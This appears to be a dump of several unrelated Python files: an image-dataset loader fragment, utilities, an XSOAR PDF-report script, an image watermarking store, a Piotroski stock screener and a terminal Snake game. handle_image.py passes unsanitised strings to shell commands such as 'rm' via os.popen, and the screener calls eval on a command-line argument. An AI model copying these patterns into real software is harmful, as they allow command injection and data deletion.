folder = os.path.abspath(os.path.expanduser(folder))
class_names = os.listdir(folder)
class_names.sort()
# class_names = class_names[:30000]
base_label = len(class_names_all)
class_names_all += class_names
print('num_classes', len(class_names), len(class_names_all))
paths = []
labels = []
names = []
for label, class_name in enumerate(class_names):
classdir = os.path.join(folder, class_name)
if os.path.isdir(classdir):
images_class = os.listdir(classdir)
images_class.sort()
images_class = [os.path.join(class_name,img) for img in images_class]
paths.extend(images_class)
labels.extend(len(images_class) * [label + base_label])
names.extend(len(images_class) * [class_name])
abspaths = [os.path.join(folder,p) for p in paths]
labels_all += labels
abspaths_all += abspaths
self.data = pd.DataFrame({'abspath': abspaths_all, 'label': labels_all})
print('num_images', len(abspaths_all))
self.prefix = folders
def init_from_list(self, filename, folder_depth=2):
print('init_from_list', filename)
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip().split(' ') for line in lines]
abspaths = [os.path.abspath(line[0]) for line in lines]
paths = ['/'.join(p.split('/')[-folder_depth:]) for p in abspaths]
if len(lines[0]) == 2:
labels = [int(line[1]) for line in lines]
names = [str(lb) for lb in labels]
elif len(lines[0]) == 1:
names = [p.split('/')[-folder_depth] for p in abspaths]
_, labels = np.unique(names, return_inverse=True)
else:
raise ValueError('List file must be in format: "fullpath(str) \
label(int)" or just "fullpath(str)"')
self.data = pd.DataFrame({'path': paths, 'abspath': abspaths, 'label': labels, 'name': names})
self.prefix = abspaths[0].split('/')[:-folder_depth]
print('num_classes', np.max(labels)+1)
print('num_images', len(names))
def write_datalist_to_file(self, filename):
print('write_datalist_to_file', filename)
with open(filename, 'w') as f:
s = ''
for index, row in self.data.iterrows():
s += row['abspath'] + ' ' + str(row['label']) + '\n'
if index % 10000 == 0:
print(index)
f.write(s)
s = ''
if len(s) > 0:
f.write(s)
exit(0)
#
# Data Loading
#
def set_base_seed(self, base_seed=0):
self.base_seed = base_seed
def _random_samples_from_class(self, label, num_samples, exception=None):
# indices_temp = self.class_indices[label]
indices_temp = list(np.where(self.data['label'].values == label)[0])
if exception is not None:
indices_temp.remove(exception)
assert len(indices_temp) > 0
# Sample indices multiple times when more samples are required than present.
indices = []
iterations = int(np.ceil(1.0*num_samples / len(indices_temp)))
for i in range(iterations):
sample_indices = np.random.permutation(indices_temp)
indices.append(sample_indices)
indices = list(np.concatenate(indices, axis=0)[:num_samples])
return indices
def _get_batch_indices(self, batch_format):
''' Get the indices from index queue and fetch the data with indices.'''
indices_batch = []
batch_size = batch_format['size']
num_classes = batch_format['num_classes']
assert batch_size % num_classes == 0
num_samples_per_class = batch_size // num_classes
idx_classes = np.random.permutation(self.classes)[:num_classes]
indices_batch = []
for c in idx_classes:
indices_batch.extend(self._random_samples_from_class(c, num_samples_per_class))
return indices_batch
def _get_batch(self, batch_format):
indices = self._get_batch_indices(batch_format)
batch = {}
for column in self.data.columns:
batch[column] = self.data[column].values[indices]
return batch
# Multithreading preprocessing images
def _batch_queue_worker_t(self, seed):
np.random.seed(seed+self.base_seed)
while True:
batch = self._get_batch(self.batch_format)
if self.proc_func is not None:
batch['image'] = self.proc_func(batch['abspath'])
self.batch_queue.put(batch)
def start_batch_queue2(self, batch_format, proc_func=None, maxsize=5, num_threads=4):
self.proc_func = proc_func
self.batch_format = batch_format
self.batch_queue = Queue(maxsize=maxsize)
self.batch_workers = []
for i in range(num_threads):
worker = Process(target=self._batch_queue_worker_t, args=(i,))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def pop_batch_queue2(self, timeout=queue_timeout):
return self.batch_queue.get(block=True, timeout=timeout)
def start_batch_queue(self, batch_format, proc_func=None, maxsize=5, num_threads=4):
self.proc_func = proc_func
self.batch_format = batch_format
def pop_batch_queue(self, timeout=queue_timeout):
batch = self._get_batch(self.batch_format)
if self.proc_func is not None:
batch['image'] = self.proc_func(batch['abspath'])
return batch
def release_queue(self):
if self.index_queue is not None:
self.index_queue.close()
if self.batch_queue is not None:
self.batch_queue.close()
if self.index_worker is not None:
self.index_worker.terminate()
del self.index_worker
self.index_worker = None
if self.batch_workers is not None:
for w in self.batch_workers:
w.terminate()
del w
self.batch_workers = None
|
utils.py
|
import math
import os.path as osp
import multiprocessing
from timeit import default_timer as timer
import numpy as np
import torch
import matplotlib.pyplot as plt
class benchmark(object):
def __init__(self, msg, enable=True, fmt="%0.3g"):
self.msg = msg
self.fmt = fmt
self.enable = enable
def __enter__(self):
if self.enable:
self.start = timer()
return self
def __exit__(self, *args):
if self.enable:
t = timer() - self.start
print(("%s : " + self.fmt + " seconds") % (self.msg, t))
self.time = t
def quiver(x, y, ax):
ax.set_xlim(0, x.shape[1])
ax.set_ylim(x.shape[0], 0)
ax.quiver(
x,
y,
units="xy",
angles="xy",
scale_units="xy",
scale=1,
minlength=0.01,
width=0.1,
color="b",
)
def recursive_to(input, device):
if isinstance(input, torch.Tensor):
return input.to(device)
if isinstance(input, dict):
for name in input:
if isinstance(input[name], torch.Tensor):
input[name] = input[name].to(device)
return input
if isinstance(input, list):
for i, item in enumerate(input):
input[i] = recursive_to(item, device)
return input
assert False
def np_softmax(x, axis=0):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum(axis=axis, keepdims=True)
def argsort2d(arr):
return np.dstack(np.unravel_index(np.argsort(arr.ravel()), arr.shape))[0]
def __parallel_handle(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count(), progress_bar=lambda x: x):
if nprocs == 0:
nprocs = multiprocessing.cpu_count()
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [
multiprocessing.Process(target=__parallel_handle, args=(f, q_in, q_out))
for _ in range(nprocs)
]
for p in proc:
p.daemon = True
p.start()
try:
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in progress_bar(range(len(sent)))]
[p.join() for p in proc]
except KeyboardInterrupt:
q_in.close()
q_out.close()
raise
return [x for i, x in sorted(res)]
|
SanePdfReport.py
|
import demistomock as demisto
from CommonServerPython import *
import traceback
import os
import shlex
import base64
import random
import string
import subprocess
from pathlib import Path
import threading
import time
import http
from http.server import HTTPServer
WORKING_DIR = Path("/app")
INPUT_FILE_PATH = 'sample.json'
OUTPUT_FILE_PATH = 'out{id}.pdf'
DISABLE_LOGOS = True # Bugfix before sane-reports can work with image files.
MD_IMAGE_PATH = '/markdown/image'
MD_HTTP_PORT = 10888
SERVER_OBJECT = None
MD_IMAGE_SUPPORT_MIN_VER = '6.5'
TABLE_TEXT_MAX_LENGTH_SUPPORT_MIN_VER = '7.0'
def random_string(size=10):
return ''.join(
random.choices(string.ascii_uppercase + string.digits, k=size))
def find_zombie_processes():
"""find zombie proceses
Returns:
([process ids], raw ps output) -- return a tuple of zombie process ids and raw ps output
"""
ps_out = subprocess.check_output(['ps', '-e', '-o', 'pid,ppid,state,stime,cmd'],
stderr=subprocess.STDOUT, universal_newlines=True)
lines = ps_out.splitlines()
pid = str(os.getpid())
zombies = []
if len(lines) > 1:
for line in lines[1:]:
pinfo = line.split()
if pinfo[2] == 'Z' and pinfo[1] == pid: # zombie process
zombies.append(pinfo[0])
return zombies, ps_out
def quit_driver_and_reap_children(killMarkdownServer):
try:
if killMarkdownServer:
# Kill Markdown artifacts server
global SERVER_OBJECT
if SERVER_OBJECT:
demisto.debug("Shutting down markdown artifacts server")
SERVER_OBJECT.shutdown()
zombies, ps_out = find_zombie_processes()
if zombies:
demisto.info(f'Found zombie processes will waitpid: {ps_out}')
for pid in zombies:
waitres = os.waitpid(int(pid), os.WNOHANG)[1]
demisto.info(f'waitpid result: {waitres}')
else:
demisto.debug(f'No zombie processes found for ps output: {ps_out}')
except Exception as e:
demisto.error(f'Failed checking for zombie processes: {e}. Trace: {traceback.format_exc()}')
def startServer():
class fileHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
demisto.debug(f'Handling MD Image request {self.path}')
if not self.path.startswith(MD_IMAGE_PATH):
# not a standard xsoar markdown image endpoint
self.send_response(400)
self.flush_headers()
return
fileID = os.path.split(self.path)[1]
try:
res = demisto.getFilePath(fileID)
file_path = res.get('path')
if file_path == '':
demisto.debug(f'Failed to get markdown file {fileID}, empty filepath returned from xsoar')
self.send_response(404)
self.flush_headers()
return
name = res.get('name')
try:
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Disposition", f'attachment; filename={name}')
self.end_headers()
# Open the file
with open(f'{file_path}', 'rb') as file:
self.wfile.write(file.read()) # Read the file and send the contents
self.flush_headers()
except BrokenPipeError: # ignore broken pipe as socket might have been closed
pass
except Exception as ex:
demisto.debug(f'Failed to get markdown file {fileID}. Error: {ex}')
self.send_response(404)
self.flush_headers()
# Make sure the server is created at current directory
os.chdir('.')
# Create server object listening the port 10888
global SERVER_OBJECT
SERVER_OBJECT = HTTPServer(server_address=('', MD_HTTP_PORT), RequestHandlerClass=fileHandler)
# Start the web server
SERVER_OBJECT.serve_forever()
def main():
try:
sane_json_b64 = demisto.args().get('sane_pdf_report_base64', '').encode(
'utf-8')
orientation = demisto.args().get('orientation', 'portrait')
resourceTimeout = demisto.args().get('resourceTimeout', '4000')
reportType = demisto.args().get('reportType', 'pdf')
headerLeftImage = demisto.args().get('customerLogo', '')
headerRightImage = demisto.args().get('demistoLogo', '')
pageSize = demisto.args().get('paperSize', 'letter')
disableHeaders = demisto.args().get('disableHeaders', '')
tableTextMaxLength = demisto.args().get('tableTextMaxLength', '300')
# Note: After headerRightImage the empty one is for legacy argv in server.js
extra_cmd = f"{orientation} {resourceTimeout} {reportType} " + \
f'"{headerLeftImage}" "{headerRightImage}" "" ' + \
f'"{pageSize}" "{disableHeaders}"'
isMDImagesSupported = is_demisto_version_ge(MD_IMAGE_SUPPORT_MIN_VER)
if isMDImagesSupported: # pragma: no cover
# start the server in a background thread
demisto.debug('Starting markdown artifacts http server...')
threading.Thread(target=startServer).start()
time.sleep(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('localhost', MD_HTTP_PORT))
if result == 0:
demisto.debug('Server is running')
sock.close()
else:
demisto.error('Markdown artifacts server is not responding')
# add md server address
mdServerAddress = f'http://localhost:{MD_HTTP_PORT}'
extra_cmd += f' "" "" "{mdServerAddress}"'
isTableTextMaxLengthSupported = is_demisto_version_ge(TABLE_TEXT_MAX_LENGTH_SUPPORT_MIN_VER)
if isTableTextMaxLengthSupported:
extra_cmd += f' {tableTextMaxLength}'
# Generate a random input file so we won't override on concurrent usage
input_id = random_string()
input_file = INPUT_FILE_PATH.format(id=input_id)
with open(WORKING_DIR / input_file, 'wb') as f:
f.write(base64.b64decode(sane_json_b64))
# Generate a random output file so we won't override on concurrent usage
output_id = random_string()
output_file = OUTPUT_FILE_PATH.format(id=output_id)
cmd = ['./reportsServer', input_file, output_file, 'dist'] + shlex.split(
extra_cmd)
# Logging things for debugging
params = f'[orientation="{orientation}",' \
f' resourceTimeout="{resourceTimeout}",' \
f' reportType="{reportType}", headerLeftImage="{headerLeftImage}",' \
f' headerRightImage="{headerRightImage}", pageSize="{pageSize}",' \
f' disableHeaders="{disableHeaders}"'
if isMDImagesSupported:
params += f', markdownArtifactsServerAddress="{mdServerAddress}"'
LOG(f"Sane-pdf parameters: {params}]")
cmd_string = " ".join(cmd)
LOG(f"Sane-pdf cmd: {cmd_string}")
LOG.print_log()
# Execute the report creation
out = subprocess.check_output(cmd, cwd=WORKING_DIR,
stderr=subprocess.STDOUT)
LOG(f"Sane-pdf output: {str(out)}")
abspath_output_file = WORKING_DIR / output_file
with open(abspath_output_file, 'rb') as f:
encoded = base64.b64encode(f.read()).decode('utf-8', 'ignore')
os.remove(abspath_output_file)
return_outputs(readable_output='Successfully generated pdf',
outputs={}, raw_response={'data': encoded})
except subprocess.CalledProcessError as e:
tb = traceback.format_exc()
wrap = "=====sane-pdf-reports error====="
err = f'{wrap}\n{tb}{wrap}, process error: {e.output}\n'
return_error(f'[SanePdfReports Automation Error - CalledProcessError] - {err}')
except Exception:
tb = traceback.format_exc()
wrap = "=====sane-pdf-reports error====="
err = f'{wrap}\n{tb}{wrap}\n'
return_error(f'[SanePdfReports Automation Error - Exception] - {err}')
finally:
quit_driver_and_reap_children(isMDImagesSupported)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
handle_image.py
|
#!/usr/bin/env python3
# 用于处理用户上传的图片
import os
import sys
import json as JSON
from PIL import Image
import threading
next_id = 0
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def near_value(i):
if i < 64:
return 0
elif i < 64*2:
return 1
elif i < 64*3:
return 2
else:
return 3
def restore_value(i):
return i*85
def decimal_to_binary(i):
return '{0:08b}'.format(i)
def binary_to_decimal(i):
return int(i, 2)
def get_value(i):
return binary_to_decimal("00000000"[:8-len(i)]+i)
def merge(image_1, image_2):
image_2 = image_2.resize(image_1.size)
data_1 = image_1.load()
data_2 = image_2.load()
result = Image.new(image_1.mode, image_1.size)
result_data = result.load()
for i in range(image_1.size[0]):
for j in range(image_1.size[1]):
r1, g1, b1, a1 = data_1[i, j]
r2, g2, b2, a2 = data_2[i, j]
result_data[i, j] = (binary_to_decimal(decimal_to_binary(r1)[:6]+decimal_to_binary(near_value(r2))[6:]),
binary_to_decimal(decimal_to_binary(g1)[:6]+decimal_to_binary(near_value(g2))[6:]),
binary_to_decimal(decimal_to_binary(b1)[:6]+decimal_to_binary(near_value(b2))[6:]),
binary_to_decimal(decimal_to_binary(a1)[:6]+decimal_to_binary(near_value(a2))[6:]))
# print(data_1.size)
return result
def unmerge(image, size=[1920, 1080]):
data = image.load()
result = Image.new(image.mode, image.size)
result_data = result.load()
for i in range(image.size[0]):
for j in range(image.size[1]):
r, g, b, a = data[i, j]
result_data[i, j] = (restore_value(get_value(decimal_to_binary(r)[6:])),
restore_value(get_value(decimal_to_binary(g)[6:])),
restore_value(get_value(decimal_to_binary(b)[6:])),
restore_value(get_value(decimal_to_binary(a)[6:])))
result = result.resize(size)
return result
def do_merge(image_1, image_2, output_name):
global next_id
temp_id = next_id
next_id += 1
print("next id is "+str(temp_id))
result = merge(image_1, image_2)
print("Saving result ...")
result.save(output_name)
print("Successful!")
def detect_images():
path = "static/images/"
result = os.popen("ls "+path).read().split("\n")
result = result[:len(result)-1]
result_temp = result.copy()
result = []
for i in result_temp:
if ".json" in i:
result.append(int(i[:i.index(".json")]))
result.sort()
index = 0
ids = []
while True:
if index not in result:
ids.append(index)
index += 1
if index >= result[len(result)-1]:
ids.append(index+1)
break
return ids
class handle_images():
def __init__(self):
self.ids = detect_images()
def update_next_id(self):
if len(self.ids) > 1:
self.next_id = self.ids[0]
self.ids = self.ids[1:]
elif len(self.ids) == 1:
self.next_id = self.ids.pop()
else:
self.next_id += 1
def add_image(self, image):
image["file"].save(image["info"]["location"]+".png")
result = os.popen("convert "+image["info"]["location"]+".png"+" png32:"+image["info"]["location"]+".temp.png").read()
image = Image.open(image["info"]["location"]+".temp.png")
image_hidden = Image.open("static/watermark_image/b.png")
eg = threading.Thread(target=do_merge, args=(image, image_hidden, image["info"]["location"]+".thumbnail.png"))
eg.start()
with open(image["info"]["location"]+".json") as file:
JSON.dump(image["data"], file)
def remove_images(self, image_ids):
for image_id in image_ids:
result = os.popen("rm "+image_id+"*").read()
def remove_image(self, location):
result = os.popen("rm "+location+"*").read()
def update_image_info(self, image_id, info):
data = self.get_image_info(image_id)
for i in info:
if info[i] != data[i]:
data[i] = info[i]
with open(image_id+".json", "w") as file:
JSON.dump(data, file)
return data
def get_image_info(self, image_id):
with open(image_id+".json", "r") as file:
data = JSON.load(file)
return data
def get_image_location(self):
result = "static/images/"+str(self.next_id)
self.update_next_id()
return result
if __name__ == "__main__":
ids = detect_images()
print(ids)
hi = handle_images()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
|
piotroski_advanced.py
|
#!/usr/bin/env python3
# Para a análise, são utilizados princípios do Joseph D. Piotroski
# Estipulados no livro: "Value Investing: The Use of Historical Financial Statement Information to Separate Winners from Losers"
# No estudo original de Piotroski, ao longo de 20 anos (1976–1996), uma estratégia de investimento baseado nessa pontuação, com a compra de empresas com F-Score alto e a venda de empresas com F-Score baixo, gerou um retorno anual de 23%, bem superior à media do mercado.
# Piotroski elaborou um Score chamado "Piotroski F-score" que varia de 0 a 9, quanto maior, por mais filtros as ações passaram
# Esse é o método avançado, onde além de ser comparado dados do ano passado e do ano atual
# Também é comparado dados do ano retrasado com do ano passado
# Princípios utilizados:
# Ano Passado e Atual
# 1. ROA > 0 (ano corrente)
# 2. FCO > 0 (ano corrente)
# 3. FCO > Lucro Líquido (ano corrente)
# 4. ROA atual > ROA ano anterior
# 5. Alavancagem atual < ano passado (Dívida Líquida / Patrimônio Líquido)
# 6. Liquidez Corrente atual > Liquidez Corrente ano anterior
# 7. Nro. Ações atual = Nro. Ações ano anterior
# 8. Margem Bruta atual > Margem Bruta ano anterior
# 9. Giro Ativo atual > Giro Ativo ano anterior
# Ano Retrasado e Passado
# 10. ROA > 0 (ano passado)
# 11. FCO > 0 (ano passado)
# 12. FCO > Lucro Líquido (ano passado)
# 13. ROA passado > ROA 2 anos atrás
# 14. Alavancagem ano passado < 2 anos atrás (Dívida Líquida / Patrimônio Líquido)
# 15. Liquidez Corrente ano passado > Liquidez Corrente 2 anos atrás
# 16. Nro. Ações ano passado = Nro. Ações 2 anos atrás
# 17. Margem Bruta ano passado > Margem Bruta 2 anos atrás
# 18. Giro Ativo ano passado > Giro Ativo 2 anos atrás
# Referência: https://medium.com/@gutenbergn/piotroski-d9a722b8ef9a
# Backtesting on USA: https://www.quant-investing.com/blogs/backtests/2018/11/06/piotroski-f-score-back-test
import sys, os
sys.path.extend([f'../{name}' for name in os.listdir("..") if os.path.isdir(f'../{name}')])
import fundamentus
import bovespa
import backtest
import browser
import pandas
import numpy
import http.cookiejar
import urllib.request
import json
import threading
import time
import pyperclip
# def print(thing):
# import pprint
# return pprint.PrettyPrinter(indent=4).pprint(thing)
def populate_shares(year):
globals()['year'] = year
globals()['infos'] = {}
if year == None:
shares = bovespa.shares()
else:
shares = fundamentus.shares(year)
shares = shares[shares['Cotação'] > 0]
shares = shares[shares['Liquidez 2 meses'] > 0]
shares['Ranking (Piotrotski)'] = 0
fill_infos(shares)
shares = add_ratings(shares)
shares = reorder_columns(shares)
return shares
# infos = {
# 'TRPL4': {
# 'roa_positivo': True/False,
# 'fco_positivo': True/False,
# 'fco_saudavel': True/False,
# 'roa_crescente': True/False,
# 'alavancagem_decrescente': True/False,
# 'liquidez_crescente': True/False,
# 'no_acoes_constante': True/False,
# 'margem_bruta_crescente': True/False,
# 'giro_ativo_crescente': True/False
# }
# }
def fill_infos(shares):
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'),
('Accept', 'text/html, text/plain, text/css, text/sgml, */*;q=0.01')]
tickers = list(shares.index)
# import pry; pry()
threads = [threading.Thread(target=fill_infos_by_ticker, args=(ticker,opener,)) for ticker in tickers]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def fill_infos_by_ticker(ticker, opener):
infos[ticker] = {
'roa_positivo': False,
'fco_positivo': False,
'fco_saudavel': False,
'roa_crescente': False,
'alavancagem_decrescente': False,
'liquidez_crescente': False,
'no_acoes_constante': False,
'margem_bruta_crescente': False,
'giro_ativo_crescente': False,
'roa_positivo_antigo': False,
'fco_positivo_antigo': False,
'fco_saudavel_antigo': False,
'roa_crescente_antigo': False,
'alavancagem_decrescente_antigo': False,
'liquidez_crescente_antigo': False,
'no_acoes_constante_antigo': False,
'margem_bruta_crescente_antigo': False,
'giro_ativo_crescente_antigo': False
}
current_year = year
# Fetching Current Year Indicators
current_indicators_url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsDashboard?ticker={ticker}'
with opener.open(current_indicators_url) as link:
company_indicators = link.read().decode('ISO-8859-1')
company_indicators = json.loads(company_indicators)
# Fetching Previous Years Indicators
yearly_indicators_url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker={ticker}'
with opener.open(yearly_indicators_url) as link:
yearly_indicators = link.read().decode('ISO-8859-1')
yearly_indicators = json.loads(yearly_indicators)
company_indicators.extend(yearly_indicators)
# Only consider company indicators before OR EQUAL to the current_year (robust solution for backtesting purposes)
company_indicators = [ci for ci in company_indicators if ci['year'] <= current_year]
if (len(company_indicators) > 0):
infos[ticker]['roa_positivo'] = company_indicators[0]['roa'] > 0
infos[ticker]['fco_positivo'] = company_indicators[0]['fco'] > 0
infos[ticker]['fco_saudavel'] = company_indicators[0]['fco'] > company_indicators[0]['lucroLiquido']
infos[ticker]['roa_positivo_antigo'] = company_indicators[1]['roa'] > 0
infos[ticker]['fco_positivo_antigo'] = company_indicators[1]['fco'] > 0
infos[ticker]['fco_saudavel_antigo'] = company_indicators[1]['fco'] > company_indicators[1]['lucroLiquido']
if (len(company_indicators) > 1):
infos[ticker]['roa_crescente'] = company_indicators[0]['roa'] > company_indicators[1]['roa']
infos[ticker]['alavancagem_decrescente'] = company_indicators[0]['dlpl'] < company_indicators[1]['dlpl']
infos[ticker]['liquidez_crescente'] = company_indicators[0]['liqCorrent'] > company_indicators[1]['liqCorrent']
infos[ticker]['no_acoes_constante'] = company_indicators[0]['qntAcoes'] == company_indicators[1]['qntAcoes']
infos[ticker]['margem_bruta_crescente'] = company_indicators[0]['margBruta'] > company_indicators[1]['margBruta']
infos[ticker]['giro_ativo_crescente'] = company_indicators[0]['giroAtivos'] > company_indicators[1]['giroAtivos']
infos[ticker]['roa_crescente_antigo'] = company_indicators[1]['roa'] > company_indicators[2]['roa']
infos[ticker]['alavancagem_decrescente_antigo'] = company_indicators[1]['dlpl'] < company_indicators[2]['dlpl']
infos[ticker]['liquidez_crescente_antigo'] = company_indicators[1]['liqCorrent'] > company_indicators[2]['liqCorrent']
infos[ticker]['no_acoes_constante_antigo'] = company_indicators[1]['qntAcoes'] == company_indicators[2]['qntAcoes']
infos[ticker]['margem_bruta_crescente_antigo'] = company_indicators[1]['margBruta'] > company_indicators[2]['margBruta']
infos[ticker]['giro_ativo_crescente_antigo'] = company_indicators[1]['giroAtivos'] > company_indicators[2]['giroAtivos']
def add_ratings(shares):
add_piotroski_columns(shares)
return fill_special_infos(shares)
# Inicializa os índices
def add_piotroski_columns(shares):
shares['Piotroski Score'] = 0
shares['ROA positivo'] = False
shares['FCO positivo'] = False
shares['FCO > Lucro Líquido'] = False
shares['ROA crescente'] = False
shares['Alavancagem decrescente'] = False
shares['Liquidez Corrente crescente'] = False
shares['No Ações constante'] = False
shares['Margem Bruta crescente'] = False
shares['Giro Ativo crescente'] = False
shares['ROA positivo antigo'] = False
shares['FCO positivo antigo'] = False
shares['FCO > Lucro Líquido antigo'] = False
shares['ROA crescente antigo'] = False
shares['Alavancagem decrescente antigo'] = False
shares['Liquidez Corrente crescente antigo'] = False
shares['No Ações constante antigo'] = False
shares['Margem Bruta crescente antigo'] = False
shares['Giro Ativo crescente antigo'] = False
def fill_special_infos(shares):
for index in range(len(shares)):
ticker = shares.index[index]
shares['Piotroski Score'][index] += int(infos[ticker]['roa_positivo'])
shares['ROA positivo'][index] = infos[ticker]['roa_positivo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_positivo'])
shares['FCO positivo'][index] = infos[ticker]['fco_positivo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_saudavel'])
shares['FCO > Lucro Líquido'][index] = infos[ticker]['fco_saudavel']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_crescente'])
shares['ROA crescente'][index] = infos[ticker]['roa_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['alavancagem_decrescente'])
shares['Alavancagem decrescente'][index] = infos[ticker]['alavancagem_decrescente']
shares['Piotroski Score'][index] += int(infos[ticker]['liquidez_crescente'])
shares['Liquidez Corrente crescente'][index] = infos[ticker]['liquidez_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['no_acoes_constante'])
shares['No Ações constante'][index] = infos[ticker]['no_acoes_constante']
shares['Piotroski Score'][index] += int(infos[ticker]['margem_bruta_crescente'])
shares['Margem Bruta crescente'][index] = infos[ticker]['margem_bruta_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['giro_ativo_crescente'])
shares['Giro Ativo crescente'][index] = infos[ticker]['giro_ativo_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_positivo_antigo'])
shares['ROA positivo antigo'][index] = infos[ticker]['roa_positivo_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_positivo_antigo'])
shares['FCO positivo antigo'][index] = infos[ticker]['fco_positivo_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_saudavel_antigo'])
shares['FCO > Lucro Líquido antigo'][index] = infos[ticker]['fco_saudavel_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_crescente_antigo'])
shares['ROA crescente antigo'][index] = infos[ticker]['roa_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['alavancagem_decrescente_antigo'])
shares['Alavancagem decrescente antigo'][index] = infos[ticker]['alavancagem_decrescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['liquidez_crescente_antigo'])
shares['Liquidez Corrente crescente antigo'][index] = infos[ticker]['liquidez_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['no_acoes_constante_antigo'])
shares['No Ações constante antigo'][index] = infos[ticker]['no_acoes_constante_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['margem_bruta_crescente_antigo'])
shares['Margem Bruta crescente antigo'][index] = infos[ticker]['margem_bruta_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['giro_ativo_crescente_antigo'])
shares['Giro Ativo crescente antigo'][index] = infos[ticker]['giro_ativo_crescente_antigo']
return shares
# Reordena a tabela para mostrar a Cotação, o Valor Intríseco e o Graham Score como primeiras colunas
def reorder_columns(shares):
columns = ['Ranking (Piotrotski)', 'Cotação', 'Piotroski Score']
return shares[columns + [col for col in shares.columns if col not in tuple(columns)]]
# Get the current_year integer value, for example: 2020
def current_year():
return int(time.strftime("%Y"))
# python3 piotroski_advanced.py "{ 'year': 2015 }"
if __name__ == '__main__':
# Opening these URLs to automatically allow this API to receive more requests from local IP
browser.open('https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsDashboard?ticker=BBAS3')
browser.open('https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker=BBAS3')
year = current_year()
if len(sys.argv) > 1:
year = int(eval(sys.argv[1])['year'])
shares = populate_shares(year)
shares.sort_values(by=['Piotroski Score', 'Cotação'], ascending=[False, True], inplace=True)
shares['Ranking (Piotrotski)'] = range(1, len(shares) + 1)
print(shares)
pyperclip.copy(shares.to_markdown())
if year != current_year():
backtest.run_all(fundamentus.start_date(year), list(shares.index[:20]))
|
main.py
|
'''
🐍🐍🐍 Snake: CLI ASCII Edition 🐍🐍🐍
Author: Faraz Malik
Date Created: 10/25/2018
Last Updated: 10/29/2018
'''
try: # Make sure user ran setup.bat so program will have readchar
import readchar
except:
raise Exception("Please run setup to install required modules")
import time
import threading
import random
import json
from gameComponents import *
#User configs
extremeMode = bool(
input("Enter 'yes' to play extreme mode, else enter nothing "))
gameMode = "extreme" if extremeMode else "normal"
#Settings
config = {
"fps": 4,
"board": {
"width": 5 if extremeMode else 20,
"height": 5 if extremeMode else 20
}
}
#Setup keystroke detection
keystate = {
"UP": False,
"DOWN": False,
"LEFT": False,
"RIGHT": True, # Snake will initailly be going right
"ENTER": False, # Used for debugging
"STATE": "RIGHT"
}
def keydowndetect(): # Thread that updates keystate
global keystate, terminateKeylogger
keymapping = { # Maps characters entered to game keystate
"w": "UP",
"s": "DOWN",
"a": "LEFT",
"d": "RIGHT",
" ": "ENTER"
}
while not terminateKeylogger:
char = readchar.readchar().decode("utf-8")
if char in keymapping.keys():
keystate = {
"UP": False,
"DOWN": False,
"LEFT": False,
"RIGHT": False,
"ENTER": False,
"STATE": None
}
state = keymapping[char]
keystate[state] = True # Modifies keystate
if state != "ENTER":
keystate["STATE"] = state
#print("Done")
terminateKeylogger = False
keyloggerThread = threading.Thread(target=keydowndetect)
keyloggerThread.daemon = True # Make it a daemon thread
keyloggerThread.start() # Start the keylogger thread
#Initialise global components
snake = Snake(keystate["STATE"], 3, round(
config["board"]["width"]/2), round(config["board"]["height"]/2))
apple = Apple(0, 0, 0, 0).newApple(
Board(config["board"]["width"], config["board"]["height"]), snake)
score = 0
#Animation Loop
# nextFrame is whether to update all components to the next screen
def updateScreen(nextFrame=True):
global keystate, apple, config, score
# Create a new board instance; like a blank canvas
gameboard = Board(config["board"]["width"], config["board"]["height"])
if apple.eaten:
score += 1
# Apple gets reassigned to a new location
apple = apple.newApple(gameboard, snake)
apple.apply(gameboard) # Draw the apple onto the board
# Draw the snake onto the board
snake.apply(gameboard, keystate, apple, nextFrame)
print(gameboard.toString(score)) # Print out the board
updateScreen(False) # Draw the fisrt frame
time.sleep(2) # Wait 2 seconds for game to start
while True:
try:
updateScreen() # Will throw an error if game over
except:
print('You died. Your score is %i' % score)
hs_file_r = open("hs.json", 'r') # Turns hs.json into a python dict
hs = json.loads(hs_file_r.read())
hs_file_r.close()
if (hs[gameMode]["score"] < score):
hs_file_w = open("hs.json", "w")
print("You made a highscore!")
